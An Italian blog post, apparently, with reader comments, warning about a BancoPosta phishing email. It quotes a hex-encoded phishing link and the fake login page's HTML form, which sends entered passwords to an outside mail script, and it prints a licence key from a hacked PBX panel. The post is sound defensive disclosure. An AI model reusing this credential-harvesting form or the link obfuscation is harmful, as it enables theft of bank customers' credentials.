Fate attenzione mi è arrivata una email con un tentativo di phising che cerca di ottenere le credenziali dell’ account Bancoposta (che peraltro non ho)…
La mail si presenta come spedita da Bancoposta@poste.it ed è scritta con in italiano corretto (niente traduttori online) ed il link
“Accedi ai Servizi online per accreditare il bonus fedeltà” punta al seguente indirizzo:
http://0x51.0xd0.0x25.0x16/poste/index.htm (IP: 81.208.37.22)
che ovviamente non è di poste italiane ma porta su una pagina che potrebbe ingannare in quanto è identica alla pagina ufficiale…
se malauguratamente inseriste la paasword sembra che questa verrebbe inviata via mail a demolatoru88@gmail.com attraverso:
http://www2.fiberbit.net/form/mailto.cgi
usando il seguende form:
<FORM name=Login onsubmit="javascript: return logintest(this);" action=http://www2.fiberbit.net/form/mailto.cgi
method=post encType=x-www-form-urlencoded><INPUT type=hidden
value=roma name=Mail_From> <INPUT type=hidden
value=demolatoru88@gmail.com name=Mail_To> <INPUT type=hidden
value="diroma" name=Mail_Subject> <INPUT type=hidden
value=http://www.poste.it name=Next_Page>
il dominio www2.fiberbit.net risulta al seguente IP 210.224.177.131
se andiamo su http://0x51.0xd0.0x25.0x16/ (81.208.37.22) troviamo
e dalle info della pagina risulta il pannelo di admin del software Skip2PBX v.2.1.0 della Idealia Group s.r.l. (http://www.idealiagroup.com/) con
licenza E0B10-A6DBA-3A082-CC9BC-A6753 (forse idealia sa di chi è e farebbe bene ad avvisare il suo cliente che gli hanno hackerato il pbx)
invece l’ip 81.208.37.22 secondo http://www.dnswatch.info/dns/dnslookup?la=en&host=+81.208.37.22&type=A&submit=Resolve alle ore 17.46 risolve in
81-208-37-22.ip.fastwebnet.it
Mi raccomando cestinatela o segnalatela come phishing… e se avete bancoposta andate a leggere la loro guida anti-phising
cavolo acor! mi hai superato…io ero arrivato solo a 50 euri….vabbè, tra qualche ora arriverà pure a me.
ps. sono a casa malato
grazie per la segnalazione, il cliente è stato avvisato e la situazione è stata risolta… problema di password troppo semplici 😉